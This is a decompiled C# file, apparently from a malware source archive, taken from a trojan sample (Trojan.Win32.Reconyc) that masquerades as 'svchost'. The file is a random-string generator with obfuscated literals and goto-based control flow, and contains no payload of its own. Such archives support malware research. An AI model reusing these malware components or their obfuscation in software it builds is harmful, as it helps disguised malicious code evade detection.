MalwareSourceCode/MSIL/Trojan/Win32/R/Trojan.Win32.Reconyc.efsu-49381cd9042bc3cc4ed4ef172003f6330ee39256d57a554e08499cf3b3054e87/_003F4_003F.cs
2022-08-18 06:28:56 -05:00

55 lines
1.9 KiB
C#

// Decompiled with JetBrains decompiler
// Type: ?1?.?4?
// Assembly: svchost, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0572F6A4-2AE0-441B-8B88-3FB3343AE211
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Reconyc.efsu-49381cd9042bc3cc4ed4ef172003f6330ee39256d57a554e08499cf3b3054e87.exe
using System;
namespace \u003F1\u003F
{
public class \u003F4\u003F
{
private const string \u003F136\u003F = "abcdefghijklmnopqrstuvwxyz";
private const string \u003F137\u003F = "0123456789";
private const string \u003F138\u003F = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
private Random \u003F139\u003F;
public \u003F4\u003F() => this.\u003F139\u003F = new Random();
public \u003F4\u003F(int _param1) => this.\u003F139\u003F = new Random(_param1);
public virtual string NextString(int _param1) => this.NextString(_param1, true, true, true);
public virtual string NextString(int _param1, bool _param2, bool _param3, bool _param4)
{
char[] chArray = new char[_param1];
string empty = string.Empty;
if (_param2)
goto label_6;
label_1:
if (_param3)
goto label_7;
label_2:
if (_param4)
goto label_8;
label_3:
for (int index1 = 0; index1 < chArray.Length; ++index1)
{
int index2 = this.\u003F139\u003F.Next(0, empty.Length);
chArray[index1] = empty[index2];
}
return new string(chArray);
label_8:
empty += \u003F195\u003F.\u003F196\u003F(":ĸȺ̴в\u0530زܴ࠺स");
goto label_3;
label_7:
empty += \u003F195\u003F.\u003F196\u003F("[śɛ͓ѓՓٓݛ࡛ज़ਜ਼ୃృൃใཛၛᅛቛፓᑓᕓᙓ\u175Bᡛᥛ");
goto label_2;
label_6:
empty += \u003F195\u003F.\u003F196\u003F("{Żɻͳѳճٳݻ\u087Bॻ\u0A7Bୣౣൣ\u0E63ཻၻᅻቻ\u1373ᑳᕳᙳ\u177B\u187B\u197B");
goto label_1;
}
}
}